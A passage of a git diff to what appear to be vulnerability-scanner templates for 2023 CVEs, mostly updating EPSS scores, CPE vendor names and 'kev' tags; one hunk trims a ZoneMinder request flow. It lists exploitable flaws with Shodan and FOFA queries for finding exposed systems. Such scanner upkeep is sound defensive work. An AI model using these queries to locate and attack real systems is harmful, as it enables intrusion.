cpe:2.3:o:securepoint:unified_threat_management:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-2272.yaml b/http/cves/2023/CVE-2023-2272.yaml index f9ce667785..4cf8b84b64 100644 --- a/http/cves/2023/CVE-2023-2272.yaml +++ b/http/cves/2023/CVE-2023-2272.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2023-2272 cwe-id: CWE-79 epss-score: 0.00064 - epss-percentile: 0.26298 + epss-percentile: 0.26204 cpe: cpe:2.3:a:tiempo:tiempo:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-22897.yaml b/http/cves/2023/CVE-2023-22897.yaml index 1882faff96..11910e97c4 100644 --- a/http/cves/2023/CVE-2023-22897.yaml +++ b/http/cves/2023/CVE-2023-22897.yaml @@ -20,8 +20,8 @@ info: cvss-score: 6.5 cve-id: CVE-2023-22897 cwe-id: CWE-908 - epss-score: 0.01648 - epss-percentile: 0.86163 + epss-score: 0.03131 + epss-percentile: 0.90084 cpe: cpe:2.3:o:securepoint:unified_threat_management:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-23161.yaml b/http/cves/2023/CVE-2023-23161.yaml index 88b3471559..53b29d80ce 100644 --- a/http/cves/2023/CVE-2023-23161.yaml +++ b/http/cves/2023/CVE-2023-23161.yaml @@ -21,13 +21,13 @@ info: cvss-score: 6.1 cve-id: CVE-2023-23161 cwe-id: CWE-79 - epss-score: 0.00091 - epss-percentile: 0.38478 - cpe: cpe:2.3:a:art_gallery_management_system_project:art_gallery_management_system:1.0:*:*:*:*:*:*:* + epss-score: 0.00107 + epss-percentile: 0.43113 + cpe: cpe:2.3:a:phpgurukul:art_gallery_management_system:1.0:*:*:*:*:*:*:* metadata: verified: true max-request: 1 - vendor: art_gallery_management_system_project + vendor: phpgurukul product: art_gallery_management_system fofa-query: title="Art Gallery Management System" tags: packetstorm,cve,cve2023,art,gallery,xss,art_gallery_management_system_project diff --git a/http/cves/2023/CVE-2023-23333.yaml b/http/cves/2023/CVE-2023-23333.yaml index 0232bbf663..34c7c7b1bd 100644 --- a/http/cves/2023/CVE-2023-23333.yaml +++ b/http/cves/2023/CVE-2023-23333.yaml @@ -20,8 +20,8 @@ info: cvss-score: 9.8 cve-id: CVE-2023-23333 cwe-id: CWE-77 - epss-score: 0.37024 - epss-percentile: 0.96803 + epss-score: 0.35263 + epss-percentile: 0.96744 cpe: cpe:2.3:o:contec:solarview_compact_firmware:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-23488.yaml b/http/cves/2023/CVE-2023-23488.yaml index adec14054e..e64805464a 100644 --- a/http/cves/2023/CVE-2023-23488.yaml +++ b/http/cves/2023/CVE-2023-23488.yaml @@ -20,8 +20,8 @@ info: cvss-score: 9.8 cve-id: CVE-2023-23488 cwe-id: CWE-89 - epss-score: 0.0214 - epss-percentile: 0.8805 + epss-score: 0.02932 + epss-percentile: 0.89793 cpe: cpe:2.3:a:strangerstudios:paid_memberships_pro:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-23489.yaml b/http/cves/2023/CVE-2023-23489.yaml index eae5a8facf..f293d6f13f 100644 --- a/http/cves/2023/CVE-2023-23489.yaml +++ b/http/cves/2023/CVE-2023-23489.yaml @@ -20,8 +20,8 @@ info: cvss-score: 9.8 cve-id: CVE-2023-23489 cwe-id: CWE-89 - epss-score: 0.11607 - epss-percentile: 0.94714 + epss-score: 0.12762 + epss-percentile: 0.94945 cpe: cpe:2.3:a:sandhillsdev:easy_digital_downloads:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-23491.yaml b/http/cves/2023/CVE-2023-23491.yaml index c98ef0e30b..facd6ec20b 100644 --- a/http/cves/2023/CVE-2023-23491.yaml +++ b/http/cves/2023/CVE-2023-23491.yaml @@ -15,8 +15,8 @@ info: cvss-score: 6.1 cve-id: CVE-2023-23491 cwe-id: CWE-79 - epss-score: 0.00071 - epss-percentile: 0.29156 + epss-score: 0.00078 + epss-percentile: 0.32657 cpe: cpe:2.3:a:fullworksplugins:quick_event_manager:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-23492.yaml b/http/cves/2023/CVE-2023-23492.yaml index df02391efc..12b2c7929d 100644 --- a/http/cves/2023/CVE-2023-23492.yaml +++ b/http/cves/2023/CVE-2023-23492.yaml @@ -19,8 +19,8 @@ info: cvss-score: 8.8 cve-id: CVE-2023-23492 cwe-id: CWE-89 - epss-score: 0.04247 - epss-percentile: 0.91325 + epss-score: 0.05192 + epss-percentile: 0.92229 cpe: cpe:2.3:a:idehweb:login_with_phone_number:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-2356.yaml b/http/cves/2023/CVE-2023-2356.yaml index 1764f47de5..f987642cd2 100644 --- a/http/cves/2023/CVE-2023-2356.yaml +++ b/http/cves/2023/CVE-2023-2356.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2023-2356 cwe-id: CWE-23 epss-score: 0.00941 - epss-percentile: 0.81285 + epss-percentile: 0.81349 cpe: cpe:2.3:a:lfprojects:mlflow:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-23752.yaml b/http/cves/2023/CVE-2023-23752.yaml index c0f9b58bf6..bb936ad1e0 100644 --- a/http/cves/2023/CVE-2023-23752.yaml +++ b/http/cves/2023/CVE-2023-23752.yaml @@ -18,8 +18,8 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N cvss-score: 5.3 cve-id: CVE-2023-23752 - epss-score: 0.75089 - epss-percentile: 0.97853 + epss-score: 0.96187 + epss-percentile: 0.99396 cpe: cpe:2.3:a:joomla:joomla\!:*:*:*:*:*:*:*:* metadata: verified: true @@ -27,7 +27,7 @@ info: vendor: joomla product: joomla\! shodan-query: html:"Joomla! - Open Source Content Management" - tags: cve,cve2023,joomla + tags: cve,cve2023,joomla,kev http: - method: GET diff --git a/http/cves/2023/CVE-2023-24044.yaml b/http/cves/2023/CVE-2023-24044.yaml index 48582ade11..af1c9446fa 100644 --- a/http/cves/2023/CVE-2023-24044.yaml +++ b/http/cves/2023/CVE-2023-24044.yaml @@ -21,8 +21,8 @@ info: cvss-score: 6.1 cve-id: CVE-2023-24044 cwe-id: CWE-601 - epss-score: 0.001 - epss-percentile: 0.40836 + epss-score: 0.00094 + epss-percentile: 0.39322 cpe: cpe:2.3:a:plesk:obsidian:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-24243.yaml b/http/cves/2023/CVE-2023-24243.yaml index eee2f39a97..817acc55dd 100644 --- a/http/cves/2023/CVE-2023-24243.yaml +++ b/http/cves/2023/CVE-2023-24243.yaml @@ -21,8 +21,8 @@ info: cvss-score: 7.5 cve-id: CVE-2023-24243 cwe-id: CWE-918 - epss-score: 0.00448 - epss-percentile: 0.722 + epss-score: 0.00541 + epss-percentile: 0.74826 cpe: cpe:2.3:a:cdata:arc:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-24278.yaml b/http/cves/2023/CVE-2023-24278.yaml index a3a2ed6100..4bea99758b 100644 --- a/http/cves/2023/CVE-2023-24278.yaml +++ b/http/cves/2023/CVE-2023-24278.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2023-24278 cwe-id: CWE-79 epss-score: 0.00099 - epss-percentile: 0.40581 + epss-percentile: 0.40654 cpe: cpe:2.3:a:squidex.io:squidex:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-24322.yaml b/http/cves/2023/CVE-2023-24322.yaml index aa329437f2..4ada248548 100644 --- a/http/cves/2023/CVE-2023-24322.yaml +++ b/http/cves/2023/CVE-2023-24322.yaml @@ -18,8 +18,8 @@ info: cvss-score: 6.1 cve-id: CVE-2023-24322 cwe-id: CWE-79 - epss-score: 0.00077 - epss-percentile: 0.31814 + epss-score: 0.0009 + epss-percentile: 0.37778 cpe: cpe:2.3:a:mojoportal:mojoportal:2.7.0.0:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-24488.yaml b/http/cves/2023/CVE-2023-24488.yaml index 8c84e14da7..ddca13fa04 100644 --- a/http/cves/2023/CVE-2023-24488.yaml +++ b/http/cves/2023/CVE-2023-24488.yaml @@ -21,8 +21,8 @@ info: cvss-score: 6.1 cve-id: CVE-2023-24488 cwe-id: CWE-79 - epss-score: 0.01193 - epss-percentile: 0.83502 + epss-score: 0.0101 + epss-percentile: 0.8202 cpe: cpe:2.3:a:citrix:gateway:*:*:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2023/CVE-2023-24489.yaml b/http/cves/2023/CVE-2023-24489.yaml index b8f3fd768a..50bd3c5246 100644 --- a/http/cves/2023/CVE-2023-24489.yaml +++ b/http/cves/2023/CVE-2023-24489.yaml @@ -19,8 +19,8 @@ info: cvss-score: 9.8 cve-id: CVE-2023-24489 cwe-id: CWE-284,NVD-CWE-Other - epss-score: 0.96945 - epss-percentile: 0.9966 + epss-score: 0.9687 + epss-percentile: 0.99637 cpe: cpe:2.3:a:citrix:sharefile_storage_zones_controller:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-24657.yaml b/http/cves/2023/CVE-2023-24657.yaml index e41072b1b4..933787094d 100644 --- a/http/cves/2023/CVE-2023-24657.yaml +++ b/http/cves/2023/CVE-2023-24657.yaml @@ -18,8 +18,8 @@ info: cvss-score: 6.1 cve-id: CVE-2023-24657 cwe-id: CWE-79 - epss-score: 0.0012 - epss-percentile: 0.45935 + epss-score: 0.03111 + epss-percentile: 0.90058 cpe: cpe:2.3:a:phpipam:phpipam:1.6:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-24733.yaml b/http/cves/2023/CVE-2023-24733.yaml index bfa447611e..7548b9ca85 100644 --- a/http/cves/2023/CVE-2023-24733.yaml +++ b/http/cves/2023/CVE-2023-24733.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2023-24733 cwe-id: CWE-79 epss-score: 0.00071 - epss-percentile: 0.29171 + epss-percentile: 0.29124 cpe: cpe:2.3:a:pmb_project:pmb:7.4.6:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-24735.yaml b/http/cves/2023/CVE-2023-24735.yaml index 63f5bf60af..bb5bc3b3f5 100644 --- a/http/cves/2023/CVE-2023-24735.yaml +++ b/http/cves/2023/CVE-2023-24735.yaml @@ -19,8 +19,8 @@ info: cvss-score: 6.1 cve-id: CVE-2023-24735 cwe-id: CWE-601 - epss-score: 0.01133 - epss-percentile: 0.83009 + epss-score: 0.01074 + epss-percentile: 0.82634 cpe: cpe:2.3:a:pmb_project:pmb:7.4.6:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-24737.yaml b/http/cves/2023/CVE-2023-24737.yaml index 2bd95581a3..8533fcd71e 100644 --- a/http/cves/2023/CVE-2023-24737.yaml +++ b/http/cves/2023/CVE-2023-24737.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2023-24737 cwe-id: CWE-79 epss-score: 0.00071 - epss-percentile: 0.2916 + epss-percentile: 0.29124 cpe: cpe:2.3:a:pmb_project:pmb:7.4.6:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-2479.yaml b/http/cves/2023/CVE-2023-2479.yaml index 9fd2019595..d9f1ce0393 100644 --- a/http/cves/2023/CVE-2023-2479.yaml +++ b/http/cves/2023/CVE-2023-2479.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2023-2479 cwe-id: CWE-78 epss-score: 0.95882 - epss-percentile: 0.99304 + epss-percentile: 0.99324 cpe: cpe:2.3:a:appium:appium-desktop:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2023/CVE-2023-25135.yaml b/http/cves/2023/CVE-2023-25135.yaml index 4257e61a4c..3f737cc96b 100644 --- a/http/cves/2023/CVE-2023-25135.yaml +++ b/http/cves/2023/CVE-2023-25135.yaml @@ -19,8 +19,8 @@ info: cvss-score: 9.8 cve-id: CVE-2023-25135 cwe-id: CWE-502 - epss-score: 0.51914 - epss-percentile: 0.97257 + epss-score: 0.50999 + epss-percentile: 0.97255 cpe: cpe:2.3:a:vbulletin:vbulletin:5.6.7:-:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-25157.yaml b/http/cves/2023/CVE-2023-25157.yaml index de3402e0ef..e917c4ed5c 100644 --- a/http/cves/2023/CVE-2023-25157.yaml +++ b/http/cves/2023/CVE-2023-25157.yaml @@ -21,8 +21,8 @@ info: cvss-score: 9.8 cve-id: CVE-2023-25157 cwe-id: CWE-89 - epss-score: 0.42337 - epss-percentile: 0.96966 + epss-score: 0.41862 + epss-percentile: 0.96974 cpe: cpe:2.3:a:osgeo:geoserver:*:*:*:*:*:*:*:* metadata: verified: "true" diff --git a/http/cves/2023/CVE-2023-25346.yaml b/http/cves/2023/CVE-2023-25346.yaml index 48bf4834ca..8852dcbad4 100644 --- a/http/cves/2023/CVE-2023-25346.yaml +++ b/http/cves/2023/CVE-2023-25346.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2023-25346 cwe-id: CWE-79 epss-score: 0.00089 - epss-percentile: 0.37178 + epss-percentile: 0.37238 cpe: cpe:2.3:a:churchcrm:churchcrm:4.5.3:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-25573.yaml b/http/cves/2023/CVE-2023-25573.yaml index 284dc9b86c..2807ce3405 100644 --- a/http/cves/2023/CVE-2023-25573.yaml +++ b/http/cves/2023/CVE-2023-25573.yaml @@ -18,8 +18,8 @@ info: cvss-score: 7.5 cve-id: CVE-2023-25573 cwe-id: CWE-862 - epss-score: 0.02726 - epss-percentile: 0.894 + epss-score: 0.02887 + epss-percentile: 0.8973 cpe: cpe:2.3:a:metersphere:metersphere:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-25717.yaml b/http/cves/2023/CVE-2023-25717.yaml index 8aa940f414..8adb2567a3 100644 --- a/http/cves/2023/CVE-2023-25717.yaml +++ b/http/cves/2023/CVE-2023-25717.yaml @@ -19,8 +19,8 @@ info: cvss-score: 9.8 cve-id: CVE-2023-25717 cwe-id: CWE-94 - epss-score: 0.96282 - epss-percentile: 0.99406 + epss-score: 0.95613 + epss-percentile: 0.99262 cpe: cpe:2.3:a:ruckuswireless:ruckus_wireless_admin:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-26035.yaml b/http/cves/2023/CVE-2023-26035.yaml index 7115763e94..e1c0d6f576 100644 --- a/http/cves/2023/CVE-2023-26035.yaml +++ b/http/cves/2023/CVE-2023-26035.yaml @@ -18,19 +18,17 @@ info: cvss-score: 9.8 cve-id: CVE-2023-26035 cwe-id: CWE-862 - epss-score: 0.10404 - epss-percentile: 0.94424 + epss-score: 0.96802 + epss-percentile: 0.99611 + cpe: cpe:2.3:a:zoneminder:zoneminder:*:*:*:*:*:*:*:* metadata: - max-request: 1 verified: true + max-request: 2 + vendor: zoneminder + product: zoneminder shodan-query: html:"ZM - Login" tags: cve,cve2023,rce,zoneminder,unauth,packetstorm -flow: | - http(1); - set("csrf_token", template["csrf_token"][0]); - http(2); - http: - raw: - | diff --git a/http/cves/2023/CVE-2023-26067.yaml b/http/cves/2023/CVE-2023-26067.yaml index eace4b6bcc..b94b0e2515 100644 --- a/http/cves/2023/CVE-2023-26067.yaml +++ b/http/cves/2023/CVE-2023-26067.yaml @@ -21,8 +21,8 @@ info: cvss-score: 8.1 cve-id: CVE-2023-26067 cwe-id: CWE-20 - epss-score: 0.02407 - epss-percentile: 0.8875 + epss-score: 0.04701 + epss-percentile: 0.9181 cpe: cpe:2.3:o:lexmark:cxtpc_firmware:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-26255.yaml b/http/cves/2023/CVE-2023-26255.yaml index d96563d514..86ee19ec7b 100644 --- a/http/cves/2023/CVE-2023-26255.yaml +++ b/http/cves/2023/CVE-2023-26255.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2023-26255 cwe-id: CWE-22 epss-score: 0.13924 - epss-percentile: 0.9511 + epss-percentile: 0.95133 cpe: cpe:2.3:a:stagil:stagil_navigation:*:*:*:*:*:jira:*:* metadata: max-request: 1 diff --git a/http/cves/2023/CVE-2023-26256.yaml b/http/cves/2023/CVE-2023-26256.yaml index 278a6da92f..0d24b64aa1 100644 --- a/http/cves/2023/CVE-2023-26256.yaml +++ b/http/cves/2023/CVE-2023-26256.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2023-26256 cwe-id: CWE-22 epss-score: 0.00599 - epss-percentile: 0.75993 + epss-percentile: 0.76089 cpe: cpe:2.3:a:stagil:stagil_navigation:*:*:*:*:*:jira:*:* metadata: max-request: 1 diff --git a/http/cves/2023/CVE-2023-26347.yaml b/http/cves/2023/CVE-2023-26347.yaml index eb7aff1fca..665beb09ca 100644 --- a/http/cves/2023/CVE-2023-26347.yaml +++ b/http/cves/2023/CVE-2023-26347.yaml @@ -16,8 +16,8 @@ info: cvss-score: 7.5 cve-id: CVE-2023-26347 cwe-id: CWE-284 - epss-score: 0.0063 - epss-percentile: 0.76679 + epss-score: 0.00522 + epss-percentile: 0.74346 cpe: cpe:2.3:a:adobe:coldfusion:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-26360.yaml b/http/cves/2023/CVE-2023-26360.yaml index 1ef6ebe5d0..a7aab62973 100644 --- a/http/cves/2023/CVE-2023-26360.yaml +++ b/http/cves/2023/CVE-2023-26360.yaml @@ -20,8 +20,8 @@ info: cvss-score: 8.6 cve-id: CVE-2023-26360 cwe-id: CWE-284 - epss-score: 0.93434 - epss-percentile: 0.98873 + epss-score: 0.94227 + epss-percentile: 0.99001 cpe: cpe:2.3:a:adobe:coldfusion:2018:-:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-26469.yaml b/http/cves/2023/CVE-2023-26469.yaml index eef6ebd3c1..394c92e514 100644 --- a/http/cves/2023/CVE-2023-26469.yaml +++ b/http/cves/2023/CVE-2023-26469.yaml @@ -21,8 +21,8 @@ info: cvss-score: 9.8 cve-id: CVE-2023-26469 cwe-id: CWE-22 - epss-score: 0.93332 - epss-percentile: 0.98859 + epss-score: 0.93851 + epss-percentile: 0.98954 cpe: cpe:2.3:a:jorani:jorani:1.0.0:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-2648.yaml b/http/cves/2023/CVE-2023-2648.yaml index 26b011502b..c52f99590c 100644 --- a/http/cves/2023/CVE-2023-2648.yaml +++ b/http/cves/2023/CVE-2023-2648.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2023-2648 cwe-id: CWE-434 epss-score: 0.05261 - epss-percentile: 0.92212 + epss-percentile: 0.92272 cpe: cpe:2.3:a:weaver:e-office:9.5:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-26842.yaml b/http/cves/2023/CVE-2023-26842.yaml index fb4a68e1f9..613d554b64 100644 --- a/http/cves/2023/CVE-2023-26842.yaml +++ b/http/cves/2023/CVE-2023-26842.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2023-26842 cwe-id: CWE-79 epss-score: 0.00148 - epss-percentile: 0.5058 + epss-percentile: 0.50683 cpe: cpe:2.3:a:churchcrm:churchcrm:4.5.3:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-26843.yaml b/http/cves/2023/CVE-2023-26843.yaml index e02b7e4b53..f1a5226106 100644 --- a/http/cves/2023/CVE-2023-26843.yaml +++ b/http/cves/2023/CVE-2023-26843.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2023-26843 cwe-id: CWE-79 epss-score: 0.00146 - epss-percentile: 0.50378 + epss-percentile: 0.50485 cpe: cpe:2.3:a:churchcrm:churchcrm:4.5.3:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-27008.yaml b/http/cves/2023/CVE-2023-27008.yaml index 4ddb72d9f8..455af4224f 100644 --- a/http/cves/2023/CVE-2023-27008.yaml +++ b/http/cves/2023/CVE-2023-27008.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2023-27008 cwe-id: CWE-79 epss-score: 0.00089 - epss-percentile: 0.37562 + epss-percentile: 0.37614 cpe: cpe:2.3:a:atutor:atutor:2.2.1:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-27034.yaml b/http/cves/2023/CVE-2023-27034.yaml index 58bee7b5cd..29fa90f3f0 100644 --- a/http/cves/2023/CVE-2023-27034.yaml +++ b/http/cves/2023/CVE-2023-27034.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2023-27034 cwe-id: CWE-89 epss-score: 0.01179 - epss-percentile: 0.8339 + epss-percentile: 0.83487 cpe: cpe:2.3:a:joommasters:jms_blog:2.5.5:*:*:*:*:prestashop:*:* metadata: max-request: 2 diff --git a/http/cves/2023/CVE-2023-27159.yaml b/http/cves/2023/CVE-2023-27159.yaml index 495a9f6b56..3181f205dd 100644 --- a/http/cves/2023/CVE-2023-27159.yaml +++ b/http/cves/2023/CVE-2023-27159.yaml @@ -21,8 +21,8 @@ info: cvss-score: 7.5 cve-id: CVE-2023-27159 cwe-id: CWE-918 - epss-score: 0.00317 - epss-percentile: 0.67077 + epss-score: 0.00258 + epss-percentile: 0.63515 cpe: cpe:2.3:a:appwrite:appwrite:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-27179.yaml b/http/cves/2023/CVE-2023-27179.yaml index 1cac952fe4..a02b770281 100644 --- a/http/cves/2023/CVE-2023-27179.yaml +++ b/http/cves/2023/CVE-2023-27179.yaml @@ -21,8 +21,8 @@ info: cvss-score: 7.5 cve-id: CVE-2023-27179 cwe-id: CWE-434 - epss-score: 0.01929 - epss-percentile: 0.8731 + epss-score: 0.01173 + epss-percentile: 0.83438 cpe: cpe:2.3:a:gdidees:gdidees_cms:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-27292.yaml b/http/cves/2023/CVE-2023-27292.yaml index fb91d05ea2..a88ea57f9b 100644 --- a/http/cves/2023/CVE-2023-27292.yaml +++ b/http/cves/2023/CVE-2023-27292.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2023-27292 cwe-id: CWE-601 epss-score: 0.00081 - epss-percentile: 0.33963 + epss-percentile: 0.33897 cpe: cpe:2.3:a:opencats:opencats:0.9.6:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-2732.yaml b/http/cves/2023/CVE-2023-2732.yaml index 371c6d0a1b..1d09078c83 100644 --- a/http/cves/2023/CVE-2023-2732.yaml +++ b/http/cves/2023/CVE-2023-2732.yaml @@ -21,8 +21,8 @@ info: cvss-score: 9.8 cve-id: CVE-2023-2732 cwe-id: CWE-288,NVD-CWE-Other - epss-score: 0.14601 - epss-percentile: 0.95215 + epss-score: 0.22111 + epss-percentile: 0.96037 cpe: cpe:2.3:a:inspireui:mstore_api:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-27350.yaml b/http/cves/2023/CVE-2023-27350.yaml index e6f76df290..f443dd5d14 100644 --- a/http/cves/2023/CVE-2023-27350.yaml +++ b/http/cves/2023/CVE-2023-27350.yaml @@ -21,8 +21,8 @@ info: cvss-score: 9.8 cve-id: CVE-2023-27350 cwe-id: CWE-284,NVD-CWE-Other - epss-score: 0.97229 - epss-percentile: 0.99799 + epss-score: 0.97243 + epss-percentile: 0.99812 cpe: cpe:2.3:a:papercut:papercut_mf:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-27372.yaml b/http/cves/2023/CVE-2023-27372.yaml index 525fe32cf9..3ba9078c67 100644 --- a/http/cves/2023/CVE-2023-27372.yaml +++ b/http/cves/2023/CVE-2023-27372.yaml @@ -20,8 +20,8 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2023-27372 - epss-score: 0.97156 - epss-percentile: 0.99755 + epss-score: 0.97043 + epss-percentile: 0.99703 cpe: cpe:2.3:a:spip:spip:*:*:*:*:*:*:*:* metadata: verified: "true" diff --git a/http/cves/2023/CVE-2023-27482.yaml b/http/cves/2023/CVE-2023-27482.yaml index e2e13a79a9..9f4fcedb67 100644 --- a/http/cves/2023/CVE-2023-27482.yaml +++ b/http/cves/2023/CVE-2023-27482.yaml @@ -22,8 +22,8 @@ info: cvss-score: 10 cve-id: CVE-2023-27482 cwe-id: CWE-287 - epss-score: 0.07144 - epss-percentile: 0.93297 + epss-score: 0.05483 + epss-percentile: 0.92447 cpe: cpe:2.3:a:home-assistant:home-assistant:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-27524.yaml b/http/cves/2023/CVE-2023-27524.yaml index 664b22a8ba..0a5cd3962b 100644 --- a/http/cves/2023/CVE-2023-27524.yaml +++ b/http/cves/2023/CVE-2023-27524.yaml @@ -20,8 +20,8 @@ info: cvss-score: 9.8 cve-id: CVE-2023-27524 cwe-id: CWE-1188 - epss-score: 0.90699 - epss-percentile: 0.98552 + epss-score: 0.96225 + epss-percentile: 0.99405 cpe: cpe:2.3:a:apache:superset:*:*:*:*:*:*:*:* metadata: verified: true @@ -29,7 +29,7 @@ info: vendor: apache product: superset shodan-query: html:"Apache Superset" - tags: packetstorm,cve,cve2023,apache,superset,auth-bypass + tags: packetstorm,cve,cve2023,apache,superset,auth-bypass,kev http: - raw: diff --git a/http/cves/2023/CVE-2023-27587.yaml b/http/cves/2023/CVE-2023-27587.yaml index 1f689d32f6..6915dfc678 100644 --- a/http/cves/2023/CVE-2023-27587.yaml +++ b/http/cves/2023/CVE-2023-27587.yaml @@ -20,8 +20,8 @@ info: cvss-score: 6.5 cve-id: CVE-2023-27587 cwe-id: CWE-209 - epss-score: 0.2767 - epss-percentile: 0.96348 + epss-score: 0.21224 + epss-percentile: 0.95983 cpe: cpe:2.3:a:readtomyshoe_project:readtomyshoe:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2023/CVE-2023-2766.yaml b/http/cves/2023/CVE-2023-2766.yaml index 819c25bbbd..e8c39456af 100644 --- a/http/cves/2023/CVE-2023-2766.yaml +++ b/http/cves/2023/CVE-2023-2766.yaml @@ -18,8 +18,8 @@ info: cvss-score: 7.5 cve-id: CVE-2023-2766 cwe-id: CWE-552 - epss-score: 0.04358 - epss-percentile: 0.91426 + epss-score: 0.05594 + epss-percentile: 0.92514 cpe: cpe:2.3:a:weaver:weaver_office_automation:9.5:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-2779.yaml b/http/cves/2023/CVE-2023-2779.yaml index a173f9a2ae..d51a3a8b17 100644 --- a/http/cves/2023/CVE-2023-2779.yaml +++ b/http/cves/2023/CVE-2023-2779.yaml @@ -16,8 +16,8 @@ info: cvss-score: 6.1 cve-id: CVE-2023-2779 cwe-id: CWE-79 - epss-score: 0.006 - epss-percentile: 0.76004 + epss-score: 0.00762 + epss-percentile: 0.79138 cpe: cpe:2.3:a:heator:social_share\,_social_login_and_social_comments:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-2780.yaml b/http/cves/2023/CVE-2023-2780.yaml index c11a1248f2..cc5d332555 100644 --- a/http/cves/2023/CVE-2023-2780.yaml +++ b/http/cves/2023/CVE-2023-2780.yaml @@ -19,8 +19,8 @@ info: cvss-score: 9.8 cve-id: CVE-2023-2780 cwe-id: CWE-29 - epss-score: 0.01608 - epss-percentile: 0.86019 + epss-score: 0.0217 + epss-percentile: 0.88199 cpe: cpe:2.3:a:lfprojects:mlflow:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-27922.yaml b/http/cves/2023/CVE-2023-27922.yaml index 8ccab41cd5..dd7e05f44c 100644 --- a/http/cves/2023/CVE-2023-27922.yaml +++ b/http/cves/2023/CVE-2023-27922.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2023-27922 cwe-id: CWE-79 epss-score: 0.00113 - epss-percentile: 0.44533 + epss-percentile: 0.44627 cpe: cpe:2.3:a:thenewsletterplugin:newsletter:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-2796.yaml b/http/cves/2023/CVE-2023-2796.yaml index dbd2865cf5..2f5b810a8d 100644 --- a/http/cves/2023/CVE-2023-2796.yaml +++ b/http/cves/2023/CVE-2023-2796.yaml @@ -19,8 +19,8 @@ info: cvss-score: 5.3 cve-id: CVE-2023-2796 cwe-id: CWE-862 - epss-score: 0.23651 - epss-percentile: 0.96117 + epss-score: 0.05279 + epss-percentile: 0.92282 cpe: cpe:2.3:a:myeventon:eventon:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-28121.yaml b/http/cves/2023/CVE-2023-28121.yaml index 6b9c9dd5fd..2bbbc13fc1 100644 --- a/http/cves/2023/CVE-2023-28121.yaml +++ b/http/cves/2023/CVE-2023-28121.yaml @@ -21,8 +21,8 @@ info: cvss-score: 9.8 cve-id: CVE-2023-28121 